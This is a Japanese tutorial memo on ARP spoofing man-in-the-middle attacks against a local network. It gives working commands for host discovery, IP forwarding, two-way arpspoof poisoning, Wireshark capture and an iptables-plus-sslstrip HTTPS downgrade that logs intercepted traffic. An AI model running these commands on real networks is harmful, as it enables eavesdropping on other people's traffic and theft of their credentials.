# ARPスプーフィング(中間者攻撃) ## 1. 攻撃対象のIPアドレス取得 > ifconfig > arp -a > nmap -F 192.168.100.0/24 などなど ![](https://i.imgur.com/3AJGXxB.png) ## 2. 攻撃者のPCを経由するパケットをフォワードさせるためにIPフォワーディングを有効 1で有効 > echo 1 > /proc/sys/net/ipv4/ip_forward 0で無効 > echo 0 > /proc/sys/net/ipv4/ip_forward このとき無効化にするとイルミパケットでpingが吸い込まれる様子が確認できる. ![](https://i.imgur.com/GGbQHTO.png) ## 3. ARPテーブル書き換え NICを wlan0 に指定して,192.168.100.123 のARPテーブルにある 192.168.100.124 のMACアドレスを攻撃者(自身)のMACアドレスに書き換える > sudo arpspoof -i wlan0 -t 192.168.100.123 192.168.100.124 ![](https://i.imgur.com/ySPobm1.png) NICを wlan0 に指定して,192.168.100.124 のARPテーブルにある 192.168.100.123 のMACアドレスを攻撃者(自身)のMACアドレスに書き換える > sudo arpspoof -i wlan0 -t 192.168.100.124 192.168.100.123 ![](https://i.imgur.com/DQovyLF.png) 注意:送信と受信両方が攻撃者PCを経由して通信するようにする為,別ターミナルで2回実行する必要がある! ## 4. パケットキャプチャ > wireshark ![](https://i.imgur.com/tCyP6fK.png) ## 5. メモ sslストリップ > iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 > sslstrip -l 8080 > cat sslstrip.log ![](https://i.imgur.com/l9UnI27.png) ## 6. 参考文献 https://qiita.com/kinokoruumu/items/a4d98c5a55243b5afe96 https://www.slideshare.net/sonickun/arp-39782351 https://network-beginner.xyz/sslstrip https://tutorialmore.com/questions-594005.htm https://netwiz.jp/arp-spoofing/ https://www.atmarkit.co.jp/ait/articles/0305/09/news003_3.html https://milestone-of-se.nesuke.com/nw-basic/ethernet/gratuitous-arp/ https://network-beginner.xyz/dns_spoof